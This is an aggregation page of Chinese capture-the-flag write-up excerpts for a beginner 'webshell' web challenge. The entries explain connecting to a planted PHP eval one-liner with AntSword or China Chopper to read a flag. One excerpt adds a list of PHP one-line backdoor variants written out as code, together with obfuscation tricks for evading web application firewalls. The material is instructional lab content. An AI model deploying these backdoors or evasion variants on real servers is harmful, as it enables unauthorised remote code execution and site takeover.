-
2021-07-28 19:22:11
从文件中我们可以看到这是一个一句话木马,我们可以直接用蚁剑进行连接
连接的密码就是我们“shell”
更多相关内容 -
攻防世界webshell
2020-01-23 11:22:57这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里 打开页面,出现一句话木马 ... ... ......这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。
题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里
打开页面,出现一句话木马
使用蚁剑进行操作,一句话木马中给出密码是shell,进行添加
点击进入添加的地址:
拿到flag
-
攻防世界之webshell(web简单)
2022-05-29 14:19:31> 这里我们需要用一种webshell的工具,像以前的超好用的“菜刀”(现在好像不太好用了),或者是“蚁剑”之类的。 下载链接:https://github.com/AntSwordProject github不太稳定,有概率进不去,多试几次就行了。 ...题目:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。
根据题意可知,在首页里有一个php一句话。打开首页,可以看到,这句话具体内容为:
<?php @eval($_POST['shell']);?>
这里我们需要用一种webshell的工具,像以前的超好用的“菜刀”(现在好像不太好用了),或者是“蚁剑”之类的。
下载链接:https://github.com/AntSwordProject github不太稳定,有概率进不去,多试几次就行了。 安装使用教程: https://blog.csdn.net/weixin_43510203/article/details/107596689
正确配置:
找到答案。
补充知识:常见的一句话
来源:https://www.jianshu.com/p/90473b8e6667 assert函数 <?php assert(@$_POST['a']); ?> create_function函数 <?php $func = create_function('',$_POST['a']); $func(); ?> 把用户传递的数据生成一个函数func(),然后再执行func() 回调函数 <?php @call_user_func(assert,$_POST['a']); ?> call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。 preg_replace函数 <?php @preg_replace("/abcde/e", $_POST['a'], "abcdefg"); ?> 这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。 file_put_contents函数 利用函数生成木马 <?php $test='<?php $a=$_POST["cmd"];assert($a); ?>'; file_put_contents("Trojan.php", $test); ?> 函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。 如何让一句话木马绕过waf ? waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。 PHP变量函数 <?php $a = "eval"; $a(@$_POST['a']); ?> 第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。 PHP可变变量 <?php $bb="eval"; $a="bb"; $$aa($_POST['a']); ?> 看这句就能理解上述语句:$$aa = $($aa) = $ (‘bb’) = $bb = "eval" str_replace函数 <?php $a=str_replace("Waldo", "", "eWaldoval"); $a(@$_POST['a']); ?> 函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。 base64_decode函数 <?php $a=base64_decode("ZXZhbA==") $a($_POST['a']); ?> 这里是base64解密函数,"ZXZhbA=="是eval的base64加密。 "."操作符 <?php $a="e"."v"; $b="a"."l"; $c=$a.$b; $c($_POST['a']); ?> parse_str函数 <?php $str="a=eval"; parse_str($str); $a($_POST['a']); ?> 执行这个函数后,生成一个变量$a,值为字符串"eval"
其他的优秀文章
https://blog.csdn.net/Wu000999/article/details/101796673
https://blog.csdn.net/weixin_39995351/article/details/115571963
https://blog.csdn.net/qq_43307937/article/details/123433717 -
攻防世界-WEB-新手-webshell
2021-10-07 13:39:08什么是webshell? webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多...【题目描述】
小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。
【附件】
在线场景
【过程及思路】
打开在线场景后出现如下字样:
先看一些基础概念。
什么是webshell?
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
简单地说,webshell是一种通过上传脚本就可以管理网站和服务器的环境,很方便。但如果不注意安全控制,也会方便了黑客入侵。
“一句话木马”
最基础的一句话如下:
<?php @eval($_POST[‘value’]);?>
其中eval函数将括号内的代码通过php语言执行,而括号内就是通过POST方式传递一个名为'value'的表单(value也可以换成其他的名字),加上@后忽略了服务器的报错。
黑客将包含“一句话”的脚本到服务器,服务器执行后,黑客便可以利用中国菜刀、蚁剑、冰蝎等工具进行连接(菜刀的原理可以见下面的博客),一句话执行的代码会返回目录的句柄,从而拿到网站服务器的webshell,达到浏览、控制的目的。
更多一句话木马的资料:
webshell一句话木马大全 – WebShell'S Blog
中国菜刀原理_weixin_34409822的博客-CSDN博客
回到题目,它提示一句话已经上传到服务器。
那我们直接用中国菜刀连接webshell,一句话中的密码是“shell”,地址后面的小框输入密码,连接要等一会。
连接成功后打开目录内的flag.txt。
flag已拿到。
本题通过简单经典的、已经部署了的“一句话木马”来非法获取和控制整个网站服务器中的目录。
但是,如何编写、如何向服务器上传“一句话”等操作并没有在题中体现。
【答案】
cyberpeace{92240939f38abbb642b941750544045c}
如果文章对你有帮助,就动动手指点赞、喜欢、支持一下咖啡猫吧,谢谢!
-
攻防世界——新手区——webshell
2020-08-19 15:27:15题目提示小明已经将php的一句话木马,放入index.php中。 打开题目可以看见,我们用中国菜刀连接的密码是shell。 知道了一句话木马的储存位置,和菜刀... 连接后发现有个flag.txt文件,直接打开查看。 获得flag。...... -
ctf-攻防世界-web:webshell
2021-11-08 19:38:01提示webshell在index.php里面,那就打开场景看看: 显然是一句话木马,密码为shell。 用菜刀或者蚁剑链接一句话,即可找到flag: -
【攻防世界】web新手练习010 webshell
2021-09-12 19:59:57【攻防世界】web新手练习010 webshell 难度系数:2 题目描述: 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 题目场景: http://111.200.241.244:63533/ 解题思路 遇见web题目,习惯性F12看... -
webshell | English 这是一个webshell收集项目 送人玫瑰,手有余香,如果各位下载了本项目,也请您能提交shell 本项目涵盖各种常用脚本 如:asp,aspx,php,jsp,pl,py 如提交各种webshell,请勿更改名称和密码 注意:...
-
攻防世界(WEB) webshell
2021-08-25 13:36:10做之前先了解了一下webshell是个什么东西 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。... -
攻防世界web入门-webshell write up
2022-03-29 20:22:58你会使用webshell吗? <?php @eval($_POST['shell']);?> 先来稍微了解一下木马:在php语言中,最简单的一句话木马语言为 : <?php @eval($_POST['attack']);?> 这句话中eval()函数表示括号内的... -
-
-
攻防世界Web “command_execution、xff_referer、webshell” 题解
2022-03-21 16:25:22攻防世界Web “xff_referer、webshell、command_execution” 三道题解。 -
攻防世界:WEB区WebShell
2021-08-16 10:25:07拿到题目,就说: 就说小明放到了index.php里面 打开网站,访问index.php,这里是个细节,虽然这个题目没有挖坑。 有可能首页不是index.php,所以web一定要完整: http://111.200.241.244:59640/index.php ...... -
攻防世界【webshell】解题方法
2022-06-16 23:00:50攻防世界【webshell】解题方法 -
攻防世界Web新shou区-webshell
2022-01-02 17:14:27攻防世界web新手区webshell解题思路 -
攻防世界,Web:webshell
2021-11-05 15:34:17知识点: (1) 作用:执行一句话木马,可以从客户端连接服务器,可以进行浏览网站结构等操作 (2)eval函数:将接受的字符串当做代码执行 (3)webshell( 通过服务器开放的端口获取服务器的(某种)权限 )的种类... -
攻防世界 | webshell WP
2020-09-13 11:45:50转载自http://blog.csdn.net/zouchengzhi1021/article/details/104074674 -
XCTF攻防世界web新手练习_ 8_webshell
2019-04-29 12:57:57XCTF攻防世界web新手练习—webshell 题目 题目为webshell,描述中,重点:把它放在了index.php里 打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀... -
攻防世界 web webshell
2020-03-01 13:29:48做题两分钟,工具两小时 ...因为这题提示是webshell,所以推测密码是shell,一开始我把那个一句话php放进去发现不对… 3.找到flag.txt cyberpeace{17b8c20c87ed744736dca537ddea2777} -
攻防世界第10关webshell
2021-09-26 19:57:40简单粗暴直接/flag.txt -
【愚公系列】2021年12月 攻防世界-简单题-WEB-010(webshell)
2021-12-25 19:45:50文章目录一、webshell二、使用步骤1.点击获取在线场景2.webshell总结webshell相关例子webshell相关工具 一、webshell 题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&... -
攻防世界web、web shell关卡使用中国蚁剑
2021-11-30 19:45:52访问web shell关卡进入此网站,得到下面一句话 打开蚁剑,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 ...webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种... -
攻防世界[刷题笔记]之Web方向(练习区)(后半)
2022-03-18 14:17:32网络安全学习攻防世界[刷题笔记]Web方向(新手区)(后半)xff_referer 攻防世界[刷题笔记] Web方向(新手区)(后半) xff_referer 题目来源: Cyberpeace-n3k0 题目描述:X老师告诉小宁其实xff和referer是可以伪造... -
攻防世界-web webshell
2022-02-09 09:39:42题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 直接尝试用蚁剑连接 连接成功,找到flag cyberpeace{becea3d09c5e643ea19022b803b16f4c} -
攻防世界Web新手专区-Write Up
2020-06-02 21:35:53添加完毕后点击GO即可得到flag Referer: https://www.google.com X-Forwarded-For: 123.123.123.123 0x010 webshell 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 解题思路: 访问页面... -
攻防世界web刷题
2022-02-11 16:47:06攻防世界web新手区view_sourcerobotsbackupcookiedisabled_buttonweak_authsimple_phpget_post view_source 随手打开源代码发现答案就在这里 robots 查看robots.txt文件 发现flag文件 backup 如果网站存在备份文件,... -
XCTF攻防世界WEB新手区题目writeup
2019-09-14 16:34:09webshell view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 点开题目在线场景,是一个网页 在网页的空白页确实无法使用右键点开查看源文件,不过直接使用... -
攻防世界web练习题
2022-01-11 10:23:14https://www.google.com 10.webshell 带有恶意目的的正常代码,蚁剑添加shell 11.command_execution ping命令常常会存在命令注入漏洞,可以用127.0.0.0.1&&ls 来测试 127.0.0.1&& find / -name “flag*”打开这个...